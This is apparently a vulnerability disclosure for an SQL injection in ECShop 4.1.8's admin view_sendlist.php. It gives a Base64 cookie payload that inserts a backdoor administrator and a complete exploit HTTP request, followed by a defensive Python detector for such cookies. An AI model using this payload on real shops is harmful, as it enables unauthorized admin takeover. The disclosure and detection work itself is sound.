curlyyyyyyyy/ecshop

ecshop

ECSHOP, 4.1.8, SQL Injection

Vulnerability Reproduction:

Log in to the backend, visit view_sendlist.php, and capture the request.

Write the SQL statement to be executed, then Base64-encode it. Here we take adding a test administrator user as an example.


Here is the Base64 encoding:

aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=

Get the value of ECSCP[lastfilterfile]; here it is F8F2F4EC.

Send the request, either replacing the previous cookie or appending the following string to the original cookie. The query string is:

act=query&uselastfilter=1

The cookie string is:

ECSCP[lastfiltersql]=aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=;ECSCP[lastfilterfile]=F8F2F4EC;

The SQL statement executes successfully.

GET /ECShop_V4.1.13/ECShop/source/ecshop/admin/view_sendlist.php?act=query&uselastfilter=1 HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: loginNum=4; ECS_LastCheckOrder=Wed%2C%2011%20Jan%202023%2014%3A38%3A48%20GMT; ECS[visit_times]=13; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1672820048; PHPSESSID=c80bf1de9332905dbf330e4fc2929cc4; JSESSIONID=7BAE8239C62E8C6B4AC401F85773ACED; ECSCP_ID=d9c053c22fb93a4801ea199b40025da9ec8286d3;ECSCP[lastfiltersql]=aW5zZXJ0IGludG8gZWNzX2FkbWluX3VzZXIodXNlcl9uYW1lLGVtYWlsLHBhc3N3b3JkLGFjdGlvbl9saXN0LG5hdl9saXN0LGFnZW5jeV9pZCkgdmFsdWVzKCd0ZXN0JywnMTIzMTIzQDEyMy5jb20nLCc0ZmNlZDlhYTY2YzQzZTVmYzg3ZDVmOTE3NjIwMWViMycsJzEnLCcxJywnMScpOyM=;ECSCP[lastfilterfile]=F8F2F4EC;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1


Refresh the database to confirm that the user was added; logging in as that user also succeeds.
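For defenders, the request shape above is recognisable in proxy or WAF logs: uselastfilter in the query string together with an ECSCP[lastfiltersql] cookie whose decoded value is not a plain SELECT. The following is an added example, not code from this repository or from ECShop; the host, path, table names and SQL text in the samples are constructed, and the keyword list is an assumption to tune per deployment.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

SQL_COOKIE = "ECSCP[lastfiltersql]"  # cookie name taken from the request above
READ_ONLY = re.compile(r"^\s*select\b", re.I)
RISKY = re.compile(r";|#|--|/\*|\b(insert|update|delete|drop|alter|outfile)\b", re.I)

def parse_cookies(value):
    """Split a Cookie header into a dict, URL-decoding names and values."""
    pairs = (p.strip().partition("=") for p in value.split(";"))
    return {unquote(n): unquote(v) for n, sep, v in pairs if sep}

def inspect_request(raw):
    """Return a finding for one raw HTTP request, or None if nothing to report."""
    lines = raw.replace("\r\n", "\n").split("\n")
    target = lines[0].split(" ")[1]
    if "uselastfilter" not in parse_qs(urlsplit(target).query, keep_blank_values=True):
        return None  # the cached filter SQL is not being requested
    fields = (l.split(": ", 1) for l in lines[1:] if ": " in l)
    headers = {k.lower(): v for k, v in fields}
    encoded = parse_cookies(headers.get("cookie", "")).get(SQL_COOKIE)
    if encoded is None:
        return None
    try:
        sql = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "undecodable lastfiltersql cookie"
    if not READ_ONLY.match(sql) or RISKY.search(sql):
        return "cookie SQL is not a plain SELECT: " + sql
    return None

def sample_request(sql):
    """Constructed request; host, path and SQL text are made up for the demo."""
    value = base64.b64encode(sql.encode()).decode()
    return ("GET /admin/view_sendlist.php?act=query&uselastfilter=1 HTTP/1.1\r\n"
            "Host: shop.example\r\n"
            f"Cookie: ECSCP_ID=0; {SQL_COOKIE}={value}; "
            "ECSCP[lastfilterfile]=00000000\r\n\r\n")

BENIGN = sample_request("SELECT * FROM demo_sendlist ORDER BY pri DESC LIMIT 0, 15")
TAMPERED = sample_request("INSERT INTO demo_table (name) VALUES ('x');#")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(name, "->", inspect_request(req))
```

This flags traffic only; it does not replace fixing the server so that it never executes SQL taken from a cookie.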
